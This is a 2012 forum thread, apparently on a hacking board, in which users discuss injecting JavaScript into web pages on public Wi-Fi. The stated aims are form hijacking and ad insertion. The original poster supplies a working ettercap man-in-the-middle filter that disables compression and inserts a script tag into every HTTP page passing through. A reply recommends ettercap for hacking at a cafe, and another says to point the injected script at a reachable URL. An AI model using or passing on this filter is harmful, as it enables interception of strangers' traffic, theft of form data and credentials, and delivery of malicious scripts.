cosbykid Posted March 3, 2012 Share Posted March 3, 2012 Is there some way to use privoxy or some other piece of local proxying software to add content to webpages, specifically javascript? I realize that there are addons for browsers such as greasemonkey and other user-script type things, but I was looking for a browser-independent, possibly router level solution to adding scripts or content to webpages. I was thinking if they could do this sort of thing at public wi-fi hotspots (adding little bars or advertisements to the top of pages) a similar concept would be possible for home users, or technology enthusiasts (well, not ads, but form hijacking scripts). If anyone has any idea if this is possible, or if they have done it before, it would be useful they could assist me in this endeavor. Sincerely, cosbykid Quote Link to comment Share on other sites More sharing options...
digip Posted March 3, 2012 Share Posted March 3, 2012 Squid and third party products do this on the enterprise networks, but if you were trying to do this to hack at a cafe, ettercap and most MITM tools would do the trick. Quote Link to comment Share on other sites More sharing options...
cosbykid Posted March 3, 2012 Author Share Posted March 3, 2012 Does ettercap have vectors for injecting javascript? If so, how does one use them? Quote Link to comment Share on other sites More sharing options...
Technoprenerd Posted March 3, 2012 Share Posted March 3, 2012 I am thinking of another idea; if you can add a little bit to the website on a 'free' wifi, potentially you might serve adds as the bit to add. That way you can serve wifi for free, and make money (potentially). Any ideas on how to do this>? Quote Link to comment Share on other sites More sharing options...
cosbykid Posted March 3, 2012 Author Share Posted March 3, 2012 okay, I believe I figured out how to do this with an ettercap filter # a very simple filter that will add an arbitrary script to all html documents right before the beginning <body> tag if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { replace("<body", "<script src='script_source.js></script><body"); msg("Script injected\n"); } essentially, this should go in and add the script (specified by script_source.js right before the beginning body tag for all the traffic that matches the parameters specified (TCP traffic on port 80). The "Accept-Encoding", "Accept-Nothing!" replace statement was something I found on the irongeek article about ettercap filters which supposedly stops content-compression on whatever site has "Accept-Encoding" in their header. The reason it's "Accept-Nothing!" instead of some other arbitrary expression is because for some reason it is necessary for the replaced statement to be the same length as the original statement being replaced. Quote Link to comment Share on other sites More sharing options...
digip Posted March 4, 2012 Share Posted March 4, 2012 Just make sure src='script_source.js points to a URL they can reach. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.